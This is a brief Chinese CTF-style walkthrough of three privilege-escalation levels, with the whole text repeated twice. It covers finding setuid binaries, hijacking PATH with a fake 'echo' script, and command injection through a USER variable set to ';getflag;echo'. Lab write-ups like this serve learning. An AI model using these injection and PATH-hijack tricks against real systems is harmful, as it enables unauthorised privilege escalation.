第一关
find / -perm 4000
找到设置了setuid的程序执行即可
/rofs/bin/.../flag01
第二关
通过构造一个假的echo命令,并把相应的路径添加到PATH环境变量的最开头
比如构造echo脚本:
#!/bin/bash
getflag
运行flag01就会显示成功
第三关
利用环境变量的漏洞,程序从环境变量USER中读入一个字符串,然后整体作为参数传递个system,这里就将USER设置为";getflag;echo"即可成功
第一关
find / -perm 4000
找到设置了setuid的程序执行即可
/rofs/bin/.../flag01
第二关
通过构造一个假的echo命令,并把相应的路径添加到PATH环境变量的最开头
比如构造echo脚本:
#!/bin/bash
getflag
运行flag01就会显示成功
第三关
利用环境变量的漏洞,程序从环境变量USER中读入一个字符串,然后整体作为参数传递个system,这里就将USER设置为";getflag;echo"即可成功